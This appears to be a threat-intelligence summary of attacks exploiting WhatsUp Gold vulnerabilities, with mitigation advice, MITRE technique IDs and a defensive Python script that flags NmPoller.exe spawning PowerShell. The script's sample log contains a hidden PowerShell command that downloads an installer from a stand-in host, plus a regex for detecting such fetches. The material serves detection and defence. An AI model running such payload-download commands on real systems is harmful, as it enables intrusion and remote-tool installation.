Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities

Sept. 18, 2024, 9 a.m.

Description

Trend Micro researchers identified remote code execution attacks on WhatsUp Gold that abused its Active Monitor PowerShell Script functionality, observed since August 30. These attacks possibly leveraged vulnerabilities CVE-2024-6670 and CVE-2024-6671, which were patched on August 16. The timeline suggests that some organizations were unable to apply the patches quickly, and incidents followed immediately after the PoC was published. Attackers abused NmPoller.exe to execute PowerShell scripts that downloaded various remote access tools and attempted to gain persistence. Mitigation steps include keeping the service under access control, applying patches immediately, and monitoring for suspicious process creation events in WhatsUp Gold environments.
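The last mitigation above, monitoring for suspicious process creation, can be turned into a concrete check. The following is an added example and not part of the Trend Micro report: it scans simplified process-creation records (a constructed "timestamp|ParentImage|Image|CommandLine" format, not a real Sysmon layout) and flags cases where NmPoller.exe spawns a PowerShell interpreter, raising the severity when the command line shows a remote download. The file paths, the pwsh.exe generalization and the download cue list are assumptions.

```python
# Added example, not code from the original report. Flags process-creation events in which
# WhatsUp Gold's poller (NmPoller.exe) spawns PowerShell, the pattern the report describes.
# Input is a constructed "timestamp|ParentImage|Image|CommandLine" record (assumed format).
import re
from typing import Dict, List

# PowerShell interpreters; pwsh.exe is included as an assumed generalization of the report.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe"}
# Command-line cues for a remote payload fetch (assumed list, raises severity to "high").
DOWNLOAD_CUE = re.compile(r"https?://|\.msi\b|downloadstring|invoke-webrequest", re.I)

def basename(path: str) -> str:
    """Return the file-name component of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed record into its four fields."""
    ts, parent, image, cmdline = line.split("|", 3)
    return {"ts": ts, "parent": parent, "image": image, "cmdline": cmdline}

def classify(event: Dict[str, str]) -> str:
    """Return 'high', 'medium' or 'none' for one process-creation event."""
    if basename(event["parent"]) != "nmpoller.exe":
        return "none"
    if basename(event["image"]) not in SUSPICIOUS_CHILDREN:
        return "none"
    return "high" if DOWNLOAD_CUE.search(event["cmdline"]) else "medium"

def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Run classify() over records and return the flagged events with a severity field."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        sev = classify(ev)
        if sev != "none":
            ev["severity"] = sev
            hits.append(ev)
    return hits

# Constructed sample log; paths, hosts and scripts are invented and not real indicators.
SAMPLE_LOG = [
    "2024-08-30T10:01:00Z|C:\\Program Files\\WhatsUp\\NmPoller.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden -c \"Invoke-WebRequest http://example.invalid/setup.msi -OutFile C:\\Temp\\setup.msi\"",
    "2024-08-30T10:02:00Z|C:\\Program Files\\WhatsUp\\NmPoller.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -File C:\\Scripts\\check-disk.ps1",
    "2024-08-30T10:03:00Z|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe",
    "2024-08-30T10:04:00Z|C:\\Program Files\\WhatsUp\\NmPoller.exe|C:\\Windows\\System32\\ping.exe|ping.exe -n 1 host.example.invalid",
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit["severity"], hit["ts"], hit["cmdline"])
```

A "medium" hit is not necessarily malicious, since Active Monitor scripts legitimately run under NmPoller.exe; it is the baseline to review against known monitors, while "high" hits warrant immediate triage.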

Date

Published: Sept. 18, 2024, 8:29 a.m.

Created: Sept. 18, 2024, 8:29 a.m.

Modified: Sept. 18, 2024, 9 a.m.

Indicators


Attack Patterns

Splashtop Remote

SimpleHelp Remote Access

Radmin

Atera Agent

T1505.003

T1059.001

T1571

T1105

T1543

T1190

T1133

T1078

CVE-2024-6671

CVE-2024-6670

CVE-2024-4885